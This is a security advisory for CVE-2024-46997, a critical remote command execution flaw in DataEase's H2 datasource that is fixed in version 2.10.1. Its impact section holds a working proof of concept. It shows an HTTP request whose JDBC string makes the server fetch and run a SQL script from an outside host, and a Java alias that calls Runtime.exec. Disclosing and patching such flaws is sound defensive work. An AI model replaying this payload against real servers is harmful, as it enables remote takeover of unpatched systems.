GHSA-h7mj-m72h-qm8w

Suggest an improvement
Source
https://github.com/advisories/GHSA-h7mj-m72h-qm8w
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-h7mj-m72h-qm8w/GHSA-h7mj-m72h-qm8w.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-h7mj-m72h-qm8w
Aliases
  • CVE-2024-46997
Published
2024-09-23T20:27:11Z
Modified
2024-09-23T21:12:33.098191Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
  • 9.3 (Critical) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
DataEase's H2 datasource has a remote command execution risk
Details

Impact

An attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string.

request message:

POST /de2api/datasource/validate HTTP/1.1
Host: dataease.ubuntu20.vm
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-DE-TOKEN: jwt
Content-Length: 209
Content-Type: application/json

{
    "id": "",
    "name": "test",
    "type": "h2",
    "configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ=="
}

h2 data source connection string:

// configuration
{
    "jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '[http://10.168.174.1:8000/poc.sql'](http://10.168.174.1:8000/poc.sql%27);",
}

the content of poc.sql:

// poc.sql
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('touch /tmp/jdbch2rce')

You can see that the file was created successfully in docker:

/tmp # ls -l jdbch2rce 
-rw-r--r--    1 root     root             0 Sep 16 22:02 jdbch2rce

Affected versions: <= 2.10.0

Patches

The vulnerability has been fixed in v2.10.1.

Workarounds

It is recommended to upgrade the version to v2.10.1.

References

If you have any questions or comments about this advisory:

Open an issue in https://github.com/dataease/dataease Email us at wei@fit2cloud.com

References

Affected packages

Maven / io.dataease:common

Package

Name
io.dataease:common
View open source insights on deps.dev
Purl
pkg:maven/io.dataease/common

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.10.1

Database specific

{
    "last_known_affected_version_range": "<= 2.10.0"
}